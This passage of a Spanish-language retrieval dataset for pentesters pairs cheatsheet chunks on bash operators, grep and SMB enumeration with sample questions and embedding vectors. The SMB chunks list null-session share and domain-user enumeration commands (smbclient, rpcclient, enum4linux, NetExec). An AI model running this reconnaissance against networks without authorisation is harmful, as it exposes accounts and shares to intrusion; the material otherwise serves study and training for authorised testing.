0.051, 0.05435, 0.01447, 0.03916, 0.09762, 0.00022, 0.0086, -0.06471, -0.02845, -0.00243, 0.04154, 0.07302, -0.01476, 0.01169, -0.05609, -0.03935, 0.04209, 0.02038, -0.0593, 0.07768, -0.1044, 0.00817, -0.04304, 0.00809, 0.04536, -0.03178, 0.02333, -0.03162, 0.01555, 0.04442, -0.00097, 0.07657, 0.01351, -0.08304, 0.04585, -0.02332, -0.05058, -0.049, 0.0037, -0.03525, -0.0423, 0.06153, 0.00376, 0.0587, -0.0024, -0.06, -0.05741, -0.03337, -0.01437, 0.01637, -0.07949, 0.12012, -0.01969, -0.04258, -0.0229, -0.03956, -0.01909, -0.02023, -0.01674, -0.03982, -0.07578, 0.0373, 0.02252, -0.05275, 0.07001, 0.05705, -0.03066, 0.08506, 0.00927, 0.08711, 0.02853, -0.01396, 0.07304, 0.04892, -0.04976, -0.03554, 0.03622, 0.0336, 0.02103, -0.00183, 0.06516, 0.03131, 0.02808, 0.01027, 0.02073, -2e-05, 0.02893, -0.0128, 0.05955, 0.05743, -0.02565, -0.02044, -0.04292, -0.03216, 0.00953, 0.01856, -0.01306, 0.00886, -0.00017, -0.08751, -0.02794, 0.05469, -0.0439, -0.1138, -0.0329, -0.04543, -0.10311, 0.0427, 0.01735, -0.00547, -0.05624, 0.023, 0.01438, -0.0241, 0.01893, -0.03069]} -{"tipo": "pregunta", "herramienta": "Operadores Bash", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Operadores Bash.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Operadores Bash\n\n> Lo primero que hay que tener claro para encadenar comandos en Kali. Base de Bucles bash sobre IPs.\n\n```\n| tuberΓ­a: salida de uno β†’ entrada del siguiente grep open f | wc -l\n> redirige salida (SOBREESCRIBE) nmap ... > out.txt\n>> redirige AΓ‘ADIENDO al final echo nota >> log.txt\n< redirige ENTRADA desde fichero enum4linux -a IP < /dev/null\n2> redirige ERRORES (stderr) cmd 2>/dev/null\n2>&1 junta errores con salida normal cmd > todo.txt 2>&1\n; secuencia (uno tras otro, pase lo que pase) cd /tmp; ls; pwd\n&& AND: el 2ΒΊ solo si el 1ΒΊ tuvo Γ‰XITO mkdir loot && cd loot\n|| OR: el 2ΒΊ solo si el 1ΒΊ FALLΓ“ ping -c1 IP || echo caido\n& segundo plano (background) nmap -p- IP &\n$( ) sustituciΓ³n de comando for ip in $(grep ...)\n* comodΓ­n enum_*.txt\n```", "indexar": "cΓ³mo puedo hacer una secuencia de operaciones donde una dependga del Γ©xito de la anterior en bash?", "v": [-0.0613, 0.13466, -0.1665, -0.0209, -0.05294, -0.1063, -0.08367, -0.08075, -0.03253, 0.01643, -0.13445, -0.01239, 0.01862, -0.02671, 0.04399, 0.00057, -0.01412, 0.0006, -0.00036, -0.01258, -0.01918, 0.02034, -0.0061, 0.13469, 0.10363, 0.04909, 0.04203, 0.03148, -0.14117, -0.07362, -0.08977, 0.04598, 0.09561, -0.06691, 0.00395, 0.07493, -0.13051, -0.0739, 0.06167, 0.13038, -0.21002, -0.05261, -0.12133, 0.06158, 0.18074, -0.02798, 0.05763, 0.07681, -0.05099, -0.12758, 0.02818, -0.04676, -0.08236, 0.00464, 0.03826, -0.04658, 0.02357, -0.13255, -0.02019, 0.0099, -0.08775, -0.06675, 0.02599, 0.07707, -0.03889, -0.04966, 0.04293, -0.0258, 0.06889, 0.07227, -0.04281, 0.13094, -0.08328, 0.13234, -0.00821, -0.00771, 0.07399, -0.0453, -0.12475, -0.06108, -0.05312, -0.0116, 0.02434, 0.03858, 0.05478, -0.02733, -0.04919, -0.00304, 0.04895, -0.04045, -0.01884, 0.03773, 0.02941, -0.04031, 0.08801, -0.06537, 0.00982, -0.03222, -0.02637, -0.00798, -0.00966, 0.01471, -0.08789, 0.09019, 0.00161, 0.08015, -0.01312, 0.04742, -0.11186, -0.02485, 0.00593, -0.04569, -0.05191, -0.01819, -0.15423, 0.00269, -0.04608, 0.00982, -0.06182, 0.06963, -0.13729, -0.00242, -0.03104, -0.02986, -0.03562, -0.02106, -0.05942, 0.1306, -0.00951, -0.05171, 0.03947, 0.06131, 0.07935, -0.00456, 0.14633, 0.0425, 0.08956, -0.11534, -0.0316, -0.10105, -0.01884, 0.01577, -0.00981, -0.0209, 0.13102, -0.05332, 0.07936, -0.12136, -0.00851, -0.07921, 0.00715, 0.05009, 0.03323, -0.04839, -0.01085, -0.01067, 0.10974, -0.08224, 0.1044, -0.03232, 0.04984, 0.06467, -0.08659, 0.0381, 0.06812, -0.04373, -0.05151, 0.03582, -0.0256, -0.0078, -0.00658, 0.07298, 0.01721, -0.06633, 0.10449, -0.00582, -0.05741, 0.00025, -0.04499, -0.02549, 0.115, 0.01089, -0.0146, -0.04476, 0.16116, -0.01137, 0.02087, -0.00647, -0.07203, 0.06549, 0.01857, -0.02533, -0.04018, -0.04715, -0.01639, -0.04597, 0.0134, 0.04199, 0.03327, -0.01818, 0.01505, -0.03647, 0.0566, -0.03078, 0.03779, -0.00695, -0.06219, 0.04597, 0.01677, 0.05626, 0.01665, -0.00339, 0.00481, 0.02296, -0.06593, -0.01123, -0.02657, -0.01606, -0.02385, 0.00844, -0.02544, -0.03517, 0.01867, 0.03533, -0.08087, -0.00788, 0.04431, -0.04925, -0.03091, 0.07252, -0.02638, 0.01885, -0.00884, -0.00479, 0.00787, -0.01191, -0.02385, -0.05524, -0.00949, -0.00076, 0.02376, 0.00645, -0.01984, -0.00831, -0.03413, 0.01571, -0.12024, 0.02604, -0.04548, -0.0373, -0.05309, 0.00369, 0.01072, 0.04243, 0.0265, 0.00292]} -{"tipo": "pregunta", "herramienta": "Operadores Bash", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Operadores Bash.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Operadores Bash\n\n> Lo primero que hay que tener claro para encadenar comandos en Kali. Base de Bucles bash sobre IPs.\n\n```\n| tuberΓ­a: salida de uno β†’ entrada del siguiente grep open f | wc -l\n> redirige salida (SOBREESCRIBE) nmap ... > out.txt\n>> redirige AΓ‘ADIENDO al final echo nota >> log.txt\n< redirige ENTRADA desde fichero enum4linux -a IP < /dev/null\n2> redirige ERRORES (stderr) cmd 2>/dev/null\n2>&1 junta errores con salida normal cmd > todo.txt 2>&1\n; secuencia (uno tras otro, pase lo que pase) cd /tmp; ls; pwd\n&& AND: el 2ΒΊ solo si el 1ΒΊ tuvo Γ‰XITO mkdir loot && cd loot\n|| OR: el 2ΒΊ solo si el 1ΒΊ FALLΓ“ ping -c1 IP || echo caido\n& segundo plano (background) nmap -p- IP &\n$( ) sustituciΓ³n de comando for ip in $(grep ...)\n* comodΓ­n enum_*.txt\n```", "indexar": "con quΓ© herramienta o tΓ©cnica redirijo errores hacia un archivo diferente a la salida normal?", "v": [-0.05539, 0.07386, -0.03936, -0.15995, -0.02141, -0.05993, -0.09263, -0.03154, 0.01568, -0.04386, -0.15105, -0.12228, -0.02334, -0.00125, 0.12812, -0.00794, 0.12228, -0.00923, 0.14222, -0.08988, -0.07921, -0.01421, -0.01289, -0.07182, -0.01405, -0.05741, 0.01475, 0.02038, -0.2274, -0.02644, -0.05955, 0.08732, 0.16292, -0.06803, -0.14602, 0.07013, 0.02595, 0.01458, -0.09345, 0.0292, -0.01739, 0.04251, -0.06614, 0.02499, 0.06919, -0.09873, 0.01855, 0.14326, 0.04092, 0.10198, 0.04353, -0.10747, -0.01862, -0.01662, -0.04694, -0.08298, 0.18664, -0.12068, 0.00387, -0.1512, -0.11412, 0.0423, -0.04724, -0.01578, 0.00688, -0.0792, -0.01562, -0.09659, -0.11544, 0.08929, -0.01897, 0.04627, 0.04962, 0.05788, -0.0393, -0.00094, -0.05336, 0.04863, 0.01813, -0.04672, 0.0065, 0.02849, -0.00245, -0.06838, -0.09167, -0.16638, 0.05123, -0.00274, -0.02211, -0.15805, -0.00106, 0.00116, 0.03696, -0.05214, 0.02349, -0.02294, 0.05137, 0.00223, -0.03761, 0.04851, 0.07002, -0.03254, -0.02888, 0.06772, 0.04112, 0.06914, -0.02246, -0.00976, -0.1186, -0.01527, -0.08259, 0.09989, 0.06161, 0.0649, -0.08504, 0.10247, -0.02488, -0.04386, -0.09615, -0.00394, 0.04878, -0.06473, -0.00306, -0.00397, -0.01161, -0.09656, -0.03128, 0.13145, -0.0327, -0.04858, -0.04565, -0.00077, -0.10209, 0.02094, -0.03372, 0.03362, 0.10316, -0.03047, 0.01495, -0.07573, 0.02168, -0.02058, -0.06291, 0.00732, 0.02301, -0.02035, 0.03173, -0.08596, -0.12941, -0.11303, -0.01869, -0.01582, 0.05047, -0.00932, -0.07245, -0.00791, -0.04789, -0.08882, -0.04804, 0.00043, -0.08568, -0.01464, 0.05974, -0.02469, 0.03975, -0.09457, -0.01504, -0.00075, 0.01576, -0.02599, -0.02548, 0.03896, 0.02162, -0.07358, -0.01565, -0.01727, -0.14485, -0.07641, 0.01448, -0.05545, -0.0362, -0.03653, -0.00234, 0.06113, 0.08056, -0.05176, 0.01135, -0.05794, 0.04664, -0.0229, -0.06871, 0.05008, 0.00016, -0.05336, -0.01204, 0.0419, 0.00094, -0.01887, 0.03315, 0.08218, 0.00113, -0.01687, 0.01647, -0.03399, 0.02242, 0.01921, -0.0753, -0.06699, -0.01895, -0.01031, 0.01901, 0.0012, 0.04768, -0.02144, -0.01782, -0.00735, -0.02427, 0.09327, -0.05566, -0.01618, 0.05702, 0.00164, 0.05959, 0.0062, -0.04041, 0.03714, 0.01652, 0.00671, -0.07, -0.00456, 0.04368, 0.02712, -0.02148, -0.01985, 0.03039, -0.02147, 0.07456, -0.00525, -0.01615, -0.05819, 0.02298, -0.0009, 0.00171, -0.02037, 0.01591, 0.03488, 0.00745, -0.00245, 0.01382, 0.00169, -0.02808, -0.00092, 0.03593, -0.03646, 0.00507, -0.09268]} -{"tipo": "pregunta", "herramienta": "Operadores Bash", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Operadores Bash.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## grep ΓΊtiles\n```\ngrep -v invertir (excluir) grep -i ignorar mayus/minus\ngrep -r recursivo grep -l solo nombre del fichero\ngrep -c contar coincidencias\n```\n\n- `< /dev/null` evita que un comando se cuelgue pidiendo `Password:` (clave en bucles).\n\nRelacionado: Operadores PowerShell Β· Bucles bash sobre IPs Β· OSCP MOC", "indexar": "que opciΓ³n hay para contar las coincidencias de grep?", "v": [0.07562, 0.08048, -0.13003, -0.07247, 0.2077, -0.09751, 0.00462, 0.07026, -0.06004, -0.07562, -0.0599, -0.02679, -0.07845, -0.03045, 0.02821, 0.10532, -0.14287, -0.03224, -0.01685, 0.04415, -0.06887, -0.01561, 0.11743, -0.06399, -0.05886, -0.05758, 0.0733, -0.01335, -0.11662, -0.00512, -0.01761, 0.00227, -0.08321, -0.08664, -0.07841, -0.02519, -0.06903, 0.07499, 0.0056, -0.11838, -0.0741, -0.02648, -0.18463, 0.11882, 0.01391, 0.0344, -0.14565, 0.20574, -0.04397, -0.00985, -0.06551, 0.05389, -0.12747, 0.00187, -0.13215, 0.11916, 0.02732, 0.08897, 0.01578, -0.06413, -0.02154, 0.04017, -0.06033, -0.02096, 0.02814, -0.01834, 0.00289, -0.02747, -0.00852, 0.06834, -0.16986, 0.03405, -0.0686, 0.02102, -0.0647, -0.0162, 0.04429, -0.07568, 0.14114, 0.03289, 0.0961, -0.00858, 0.02102, -0.02643, -0.02601, -0.07419, 0.05135, -0.04345, -0.10602, 0.03058, -0.00367, 0.06579, 0.04989, 0.12145, -0.02307, -0.08359, 0.03541, 0.02334, 0.02691, 0.04865, 0.0982, -0.04293, -0.10357, 0.1022, -0.0598, 0.04432, 0.09504, 0.11232, -0.04167, -0.09279, 0.00378, 0.03487, 0.05921, -0.08796, 0.00951, -0.06881, 0.0084, -0.03029, 0.01706, 0.06423, -0.06052, -0.0601, 0.02666, 0.02554, -0.02971, 0.04488, -0.01606, 0.07477, 0.04569, 0.03679, -0.11986, -0.00292, 0.04461, 0.00538, -0.01905, 0.00299, 0.05562, 0.04544, 0.03958, 0.00204, -0.00093, 0.00356, -0.01684, -0.09186, 0.03135, -0.09266, 0.03227, 0.02697, -0.01851, 0.05954, -0.02262, -0.03596, -0.04242, 0.03886, -0.03018, 0.03025, 0.03526, -0.08518, 0.01832, -0.00412, -0.10883, -0.05202, -0.03402, 0.02184, 0.00673, -0.01758, 0.00847, -0.03095, 0.08213, -0.03384, 0.01394, 0.0705, -0.06205, -0.02004, -0.04362, -0.04623, 0.00933, -0.00508, 0.01362, -0.06306, -0.02874, -0.01203, -0.00171, -0.01088, 0.0241, -0.07232, -0.0437, 0.05885, 0.01214, 0.07739, -0.00314, 0.04451, -0.01172, 0.05153, -0.04964, -0.08832, 0.04542, -0.02212, 0.11962, 0.05383, -0.08078, 0.0435, -0.00112, -0.03645, 0.07725, 0.04233, -0.11717, 0.01529, -0.01493, -0.03094, 0.05031, -0.02733, 0.10082, -0.07896, -0.02455, -0.03544, 0.03369, -0.01748, 0.04378, -0.00606, 0.05781, -0.02566, 0.07453, 0.007, -0.08323, 0.00323, 0.09079, -0.01297, 0.08741, 0.04888, -0.02451, 0.03642, -0.01691, -0.00396, -0.0215, 0.01564, 0.0586, -0.01066, -0.06786, -0.02612, 0.02899, 0.06933, -0.03938, -0.00828, -0.06245, -0.03219, -0.05168, 0.0463, -0.02259, -0.13889, 0.03422, 0.05035, 0.00176, -0.01859, 0.01663, -0.01484]} -{"tipo": "pregunta", "herramienta": "Operadores Bash", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Operadores Bash.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## grep ΓΊtiles\n```\ngrep -v invertir (excluir) grep -i ignorar mayus/minus\ngrep -r recursivo grep -l solo nombre del fichero\ngrep -c contar coincidencias\n```\n\n- `< /dev/null` evita que un comando se cuelgue pidiendo `Password:` (clave en bucles).\n\nRelacionado: Operadores PowerShell Β· Bucles bash sobre IPs Β· OSCP MOC", "indexar": "con quΓ© puedo hacer que grep busque recursivamente por todos los archivos?", "v": [-0.11569, -0.03225, -0.04449, -0.18044, 0.19408, -0.0752, 0.07287, 0.09043, 0.02025, -0.17582, -0.10193, -0.08547, 0.02408, 0.01953, 0.11708, -0.0632, -0.02013, 0.1941, 0.03614, 0.00981, 0.01093, -0.11333, 0.01375, -0.09455, -0.00897, -0.13833, 0.02405, 0.10229, -0.11142, -0.19573, -0.11313, 0.03358, -0.03325, -0.06815, -0.1312, 0.06149, 0.06582, 0.11523, -0.08036, -0.00848, -0.03189, 0.01014, -0.23649, 0.09084, -0.08872, -0.11035, 0.00818, 0.01798, -0.05505, 0.01416, -0.10431, -0.08056, -0.14074, 0.0426, -0.05458, 0.03486, 0.03557, -0.09301, 0.0294, -0.11852, -0.09442, 0.07421, 0.0306, -0.02304, 0.00756, -0.01481, 0.04893, -0.03231, -0.00701, 0.07582, -0.05991, 0.0054, 0.02627, -0.01747, -0.01585, 0.07547, 0.06652, 0.00234, 0.07155, 0.07268, -0.04814, -0.04761, -0.07057, -0.10508, -0.00473, -0.07676, 0.0434, 0.00491, -0.00078, -0.09879, 0.04563, -0.01239, -0.01321, 0.06062, -0.03549, -0.01486, 0.02246, 0.04105, -0.02895, 0.01462, -0.06453, -0.0481, -0.08885, 0.15961, 0.07566, 0.05022, 0.00808, 0.13207, -0.02674, -0.05988, 0.04015, 0.08671, -0.04505, -0.00178, -0.0979, 0.04738, -0.13063, -0.02746, -0.01116, 0.07227, 0.01, 0.01955, -0.02451, 0.0013, 0.07689, -0.004, 0.0601, 0.09043, 0.00652, 0.08282, -0.02779, 0.02201, 0.01185, -0.03196, -0.05239, -0.03219, 0.09253, 0.0664, 0.033, -0.02821, 0.10984, 0.00207, 0.04473, -0.06348, 0.0503, -0.0335, 0.0406, 0.01917, -0.03089, -0.10446, 0.00055, -0.04131, -0.02369, -0.0356, 0.00284, 0.07619, 0.03041, -0.11715, 0.01163, 0.01858, -0.13131, 0.02084, -0.03343, 0.02898, 0.01781, -0.00113, -0.02493, -0.00904, 0.02224, -0.00922, -0.03318, -0.03437, -0.06173, -0.03527, 0.03724, 0.03962, -0.04513, 0.00033, 0.04659, -0.06957, 0.03553, -0.03647, -0.0133, 0.02644, 0.01421, -0.03968, 0.05165, 0.07586, 0.00226, 0.05454, 0.01733, 0.0476, -0.0415, 0.02807, -0.03684, -0.01457, -0.00504, 0.00234, 0.0474, 0.01321, 0.00572, -0.01875, -0.00865, 0.04305, 0.04923, -0.01072, -0.05682, -0.00213, 0.0925, 0.00496, 0.05316, 0.02318, 0.09559, -0.01171, -0.04351, 0.04285, -0.04306, -0.00562, -0.03717, 0.00793, 0.08182, 0.03271, 0.03467, 0.07954, -0.0225, 0.01669, 0.01623, -0.03416, -0.02162, 0.00357, -0.02563, 0.03004, -0.01181, -0.01411, -0.0294, -0.01046, -0.0135, -0.03001, 0.00117, 0.0067, -0.01255, 0.03632, -0.02241, 0.02642, -0.05424, -0.01837, -0.01845, 0.00186, -0.00486, -0.08339, 0.0186, 0.01314, 0.00072, 0.00589, 0.02719, -0.01483]} -{"tipo": "pregunta", "herramienta": "Operadores Bash", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Operadores Bash.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## grep ΓΊtiles\n```\ngrep -v invertir (excluir) grep -i ignorar mayus/minus\ngrep -r recursivo grep -l solo nombre del fichero\ngrep -c contar coincidencias\n```\n\n- `< /dev/null` evita que un comando se cuelgue pidiendo `Password:` (clave en bucles).\n\nRelacionado: Operadores PowerShell Β· Bucles bash sobre IPs Β· OSCP MOC", "indexar": "quΓ© alternativa a grep -v me sirve para excluir resultados?", "v": [0.00799, 0.05774, -0.10743, -0.09691, 0.04273, -0.01938, -0.06317, -0.03514, 0.00525, -0.10915, -0.0607, -0.16057, 0.03085, -0.08963, 0.16993, -0.03498, -0.09435, -0.07005, 0.13789, 0.00083, -0.07706, 0.01275, -0.03742, -0.19396, -0.13609, 0.01558, -0.05039, 0.06374, -0.03879, -0.05782, -0.07337, -0.0054, -0.03006, -0.0937, -0.19682, 0.08598, 0.09566, 0.01429, 0.04947, -0.01051, -0.02878, -0.08975, -0.07884, 0.01105, -0.0239, -0.11245, -0.05892, 0.10551, -0.09199, 0.10887, -0.11644, 0.01288, -0.06382, -0.00543, -0.02308, 0.0802, -0.05924, -0.08964, -0.00454, -0.05246, -0.08498, -0.05339, 0.01036, 0.00179, 0.0754, 0.04389, 0.00058, -0.02494, 0.03734, 0.06808, -0.09, 0.05985, 0.07159, -0.11261, -0.15082, 0.00424, 0.02417, 0.02862, 0.00734, 0.00101, 0.09164, -0.04528, -0.0585, -0.05234, 0.0151, -0.02335, 0.04023, -0.02938, -0.01165, -0.06764, -0.01453, 0.03982, 0.04115, 0.06475, -0.08304, -0.10223, -0.03382, 0.04605, -0.04388, 0.01179, 0.08232, 0.0119, -0.0767, -0.02616, 0.01306, -0.01031, -0.04516, 0.13897, -0.17326, 0.03068, 0.02443, 0.04998, -0.0284, 0.00448, 0.02506, -0.02976, -0.00088, 0.05404, -0.06583, 0.03192, -0.08445, 0.04851, -0.0292, -0.04278, -0.03826, 0.0217, 0.15891, -0.01691, 0.04652, 0.06892, -0.00978, -0.0176, 0.02115, -0.07001, -0.05262, -0.09476, 0.10212, -0.00397, 0.08604, 0.01442, 0.00174, -0.04863, -0.01333, -0.06646, -0.0581, -0.12226, 0.13442, 0.0405, 0.11977, -0.06969, -0.04999, -0.16823, -0.082, 0.01531, -0.04813, 0.01235, -0.01605, -0.03079, -0.02552, 0.05335, -0.06177, -0.09314, -0.02946, 0.05336, -0.04107, 0.00367, 0.02924, -0.02993, -0.00477, 0.03951, 0.02963, 0.03045, 0.03256, -0.04143, 0.05286, 0.02949, 0.01451, 0.03448, 0.00209, -0.02485, 0.03315, 0.01963, 0.00074, 0.02745, 0.06935, -0.05395, 0.0439, 0.0095, -0.0438, 0.03417, -0.03166, 0.01454, -0.06089, -0.07266, -0.05884, 0.02807, 0.10524, -0.05484, -0.02145, -0.01437, -0.02444, 0.00027, 0.0011, 0.00583, -0.01763, -0.01896, -0.03292, -0.02641, 0.10531, -0.02974, 0.01159, 0.06444, 0.05277, 0.01469, -0.02275, 0.03705, -0.01111, -0.01737, 0.01072, 0.01181, -0.00464, -0.08892, -0.05291, 0.08559, -0.01349, 0.061, -0.04663, -0.03042, -0.02772, -0.00812, 0.03551, -0.05862, 0.00563, 0.07356, -0.0894, -0.10638, -0.05321, 0.02126, 0.01896, -0.01509, -0.01548, -0.03633, 0.00353, 0.06835, -0.08444, 0.0362, -0.02062, -0.00175, -0.07333, -0.03855, -0.02916, -0.00165, -0.03737, 0.07553, 0.06669, 0.07485]} -{"tipo": "pregunta", "herramienta": "SMB", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SMB.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Listar shares y usuarios\n```bash\nsmbclient -L //IP/ -N # shares con sesiΓ³n nula (OJO: trunca comentarios)\nsmbclient //IP/share -N # entrar (ls, get, !cat)\nsmbclient -L //IP/ -U usuario # con credenciales\nrpcclient -U \"\" -N IP -c \"netshareenumall\" # shares + remark COMPLETO (no trunca)\nrpcclient -U \"\" -N IP -c \"enumdomusers\" # usuarios de dominio (SAM)\nenum4linux -a IP # TODO (pilla users UNIX locales por RID cycling)\nnxc smb IP -u '' -p '' --shares --users # NetExec (sucesor de CrackMapExec)\n```", "indexar": "quΓ© herramienta puedo usar para listar los shares y usuarios de un servidor SMB?", "v": [0.01729, 0.01869, -0.16126, -0.19451, -0.07419, -0.18261, -0.1572, -0.21352, 0.02582, -0.0294, -0.17619, -0.07106, 0.09941, -0.133, 0.00134, 0.04554, 0.1097, -0.13816, -0.03153, 0.02308, 0.10951, 0.05498, -0.06952, -0.04914, -0.14398, 0.05494, 0.0436, -0.10107, -0.1189, 0.05473, -0.06773, -0.05076, 0.02167, -0.03192, -0.02808, -0.0749, -0.01665, 0.05698, -0.00268, 0.07915, 0.07147, 0.0639, -0.07356, -0.06323, -0.01015, 0.04415, -0.03932, -0.02692, 0.03014, 0.02863, -0.06287, -0.0837, -0.15489, 0.03713, -0.0692, -0.07923, 0.14668, -0.18855, 0.04429, -0.08536, -0.19319, 0.04351, -0.03828, -0.02659, -0.0215, -0.07691, -0.00639, -0.00805, -0.14315, 0.04355, -0.05612, 0.0754, 0.03314, -0.06833, 0.04741, 0.09612, 0.03111, -0.02671, 0.02344, 0.01684, 0.0121, -0.03338, -0.0238, 0.0389, -0.07427, -0.10724, 0.08096, -0.05021, 0.05719, -0.03599, 0.02273, 0.08022, -0.02692, 0.02629, 0.00017, -0.02986, 0.10542, -0.03397, 0.00116, -0.03702, 0.1675, 0.04638, -0.05844, 0.08295, -0.00473, 0.04454, 0.01916, -0.05151, -0.01902, -0.03285, 0.07596, -0.00376, -0.0358, 0.00766, -0.04472, -0.01406, -0.04064, -0.0626, -0.03645, -0.02642, 0.00239, -0.00027, 0.01163, -0.07413, 0.05469, -0.02257, 0.05758, 0.09181, -0.07625, -0.08754, -0.0491, -0.01367, -0.07046, -0.02304, -0.04586, 0.0055, 0.03752, -0.08978, -0.04345, -0.01494, 0.00126, 0.03512, -0.09282, -0.04961, 0.07273, -0.01439, 0.043, -0.07559, -0.08521, -0.01632, 0.0809, -0.07748, -0.08132, -0.02346, -0.04003, 0.00602, 0.00921, -0.06404, -0.09342, 0.02823, -0.04927, -0.03294, 0.0349, 0.07912, 0.003, -0.04384, 0.03864, 0.03146, 0.03851, 0.03963, 0.05551, 0.08915, 0.05694, -0.04964, 0.04493, -0.07557, -0.06057, 0.02456, -0.02666, -0.02193, -0.02182, -0.02875, -0.01734, -0.00192, -0.01008, -0.05725, -0.01246, -0.0056, -0.00136, 0.0509, -0.06659, 0.06936, 0.01995, -0.00061, 0.04941, -0.03621, 0.01508, -0.03729, -0.0067, -0.03115, -0.04192, 0.0019, -0.07596, -0.05048, 0.04916, -0.01081, -0.02269, 0.00861, 0.04394, -0.00723, 0.03764, -0.01161, 0.06993, -0.01833, -0.02041, -0.02605, 0.03706, 0.00273, 0.0205, -0.06312, 0.01208, 0.04026, 0.00983, 0.01022, -0.00094, 0.06284, -0.03066, -0.0331, 0.02431, 0.00453, -0.01343, 0.0137, -0.0076, -0.00121, 0.01327, -0.05344, 0.00547, 0.00015, -0.03069, -0.01447, -0.07055, 0.06963, -0.0053, -0.03036, -0.03103, -0.0356, -0.01814, -0.0327, -0.05983, -0.05018, 0.00246, -0.04666, 0.07707, -0.03662, -0.00054, 0.00066]} -{"tipo": "pregunta", "herramienta": "SMB", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SMB.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Listar shares y usuarios\n```bash\nsmbclient -L //IP/ -N # shares con sesiΓ³n nula (OJO: trunca comentarios)\nsmbclient //IP/share -N # entrar (ls, get, !cat)\nsmbclient -L //IP/ -U usuario # con credenciales\nrpcclient -U \"\" -N IP -c \"netshareenumall\" # shares + remark COMPLETO (no trunca)\nrpcclient -U \"\" -N IP -c \"enumdomusers\" # usuarios de dominio (SAM)\nenum4linux -a IP # TODO (pilla users UNIX locales por RID cycling)\nnxc smb IP -u '' -p '' --shares --users # NetExec (sucesor de CrackMapExec)\n```", "indexar": "con quΓ© programa puedo ver las particiones compartidas sin necesidad de iniciar sesiΓ³n?", "v": [-0.03695, 0.18778, -0.11135, -0.09834, 0.05564, -0.07595, 0.0566, -0.17064, -0.04899, -0.12294, -0.05587, 0.08005, -0.03898, -0.10243, -0.03672, 0.08084, 0.04783, 0.04393, 0.06093, 0.00277, -0.0258, 0.03049, 0.06838, 0.00257, 0.03183, 0.02348, 0.14303, -0.04851, -0.08187, -0.05848, -0.01289, -0.04677, 0.07901, -0.06216, 0.04738, -0.03439, -0.0409, 0.08057, 0.03785, -0.01007, -0.05828, 0.12816, -0.05312, 0.03961, 0.10569, -0.03516, -0.02082, 0.07642, -0.00414, -0.03009, -0.00223, 0.06692, -0.07327, -0.02371, 0.02617, -0.03991, 0.06127, -0.14414, -0.01311, 0.03208, -0.06868, 0.10237, 0.01263, 0.00169, 0.05739, -0.03861, 0.00798, 0.09983, 0.01977, 0.15836, -0.18117, -0.05399, -0.07497, -0.12187, 0.04972, -0.00287, -0.06046, -0.03467, 0.00479, 0.00947, 0.08108, -0.03913, 0.084, 0.01681, -0.07154, -0.01592, 0.09154, 0.01083, 0.01152, -0.09977, -0.0061, 0.02179, 0.02722, -0.03012, 0.06032, -0.02968, 0.0821, 0.13232, -0.02455, 0.10349, 0.04935, -0.0109, -0.04566, 0.09248, -0.05617, 0.00037, 0.02465, -0.06246, -0.03922, 0.07863, 0.03182, 0.03691, -0.04475, -0.10738, -0.03588, -0.01212, -0.11232, -0.04336, -0.0269, 0.00095, -0.04204, 0.01462, -0.02691, -0.01845, 0.03495, -0.13541, -0.01692, 0.20777, -0.05545, 0.05138, -0.0719, -0.00844, -0.01339, -0.0467, -0.09207, -0.07323, 0.00865, -0.00439, -0.02169, -0.15353, 0.02848, 0.08016, 0.04336, -0.03222, 0.02034, 0.07563, 0.04223, -0.07137, -0.01385, 0.06973, 0.03937, 0.02179, 0.0022, 0.04451, -0.1103, 0.04367, 0.07521, -0.12162, -0.01917, 0.00368, -0.07621, 0.00437, -0.08147, -0.08677, 0.11152, -0.10227, -0.03857, 0.04565, 0.03226, 0.08317, -0.05098, 0.06778, -0.05878, -0.06638, -0.02246, -0.02097, -0.00485, -0.09054, 0.03087, -0.04054, -0.12804, 0.00646, 0.02298, -0.01049, -0.03576, -0.04422, -0.11287, 0.0059, 0.03586, -0.04066, 0.03198, 0.01918, -0.07039, -0.00331, 0.01565, -0.07716, -0.03427, -0.05751, 0.06254, 0.00661, -0.06315, 0.02433, -0.03171, 0.00393, 0.06573, 0.03691, -0.04314, 0.06028, 0.01439, 0.0527, -0.02576, -0.03273, 0.02623, -0.02353, -0.02176, 0.02411, 0.04055, -0.00426, 0.02896, 0.05217, 0.00835, 0.03617, 0.04901, 0.02681, 0.05158, -0.0776, 0.03344, 0.04778, 0.08264, 0.07531, -0.02036, 0.00227, -0.01456, -0.00762, 0.06974, 0.0164, -0.00136, -0.05312, -0.04047, -0.02775, 0.0007, 0.09304, -0.02173, -0.09512, -0.01633, 0.0251, -0.08262, -0.02525, 0.01204, -0.03402, -0.03845, -0.00622, 0.06033, -0.08918, 0.03565, 0.02129]} -{"tipo": "pregunta", "herramienta": "SMB", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SMB.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Desde Windows\n```cmd\nnet view \\\\dc01 /all :: shares incl. ocultos. Admin shares: ADMIN$, C$, IPC$\n```", "indexar": "quΓ© programa puedo usar desde Windows para ver las carpetas compartidas de otro ordenador incluyendo las ocultas?", "v": [0.14521, 0.12822, -0.13032, -0.02495, 0.01642, -0.0787, 0.05399, -0.03293, -0.08633, -0.10858, -0.08161, -0.10123, -0.11976, -0.02862, -0.00668, -0.02977, 0.08943, -0.06392, 0.03937, -0.00466, 0.02591, -0.03228, -0.00371, -0.01541, -0.04643, 0.06794, 0.05059, -0.04149, -0.06908, -0.04249, 0.03492, 0.07807, 0.02109, -0.05455, -0.05698, -0.05422, -0.07264, -0.04867, 0.0549, -0.00878, 0.12746, 0.13391, -0.0845, 0.07138, 0.14036, 0.00114, -0.03384, -0.01391, 0.00937, -0.04437, -0.1056, -0.09009, -0.09927, 